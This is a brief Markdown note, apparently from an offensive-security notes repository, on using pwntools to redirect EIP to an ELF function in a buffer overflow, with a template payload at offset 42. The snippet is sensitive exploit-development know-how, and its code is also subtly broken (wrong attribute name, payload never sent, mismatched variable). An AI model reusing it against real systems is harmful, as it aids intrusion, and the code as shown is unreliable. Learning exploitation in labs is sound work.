killchain-compendium/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md

16 lines
289 B
Markdown

# pwntools
## Memory Addresses of ELF Binary
* Find address of function and use it on $eip
```python
p = process(<binary>)
elf = ELF(<binary>)
__function = elf.symbol.<functionName>
payload = fit({
42: __function # Length measured via cyclic
})
p.sendline()
proc.interactive()
```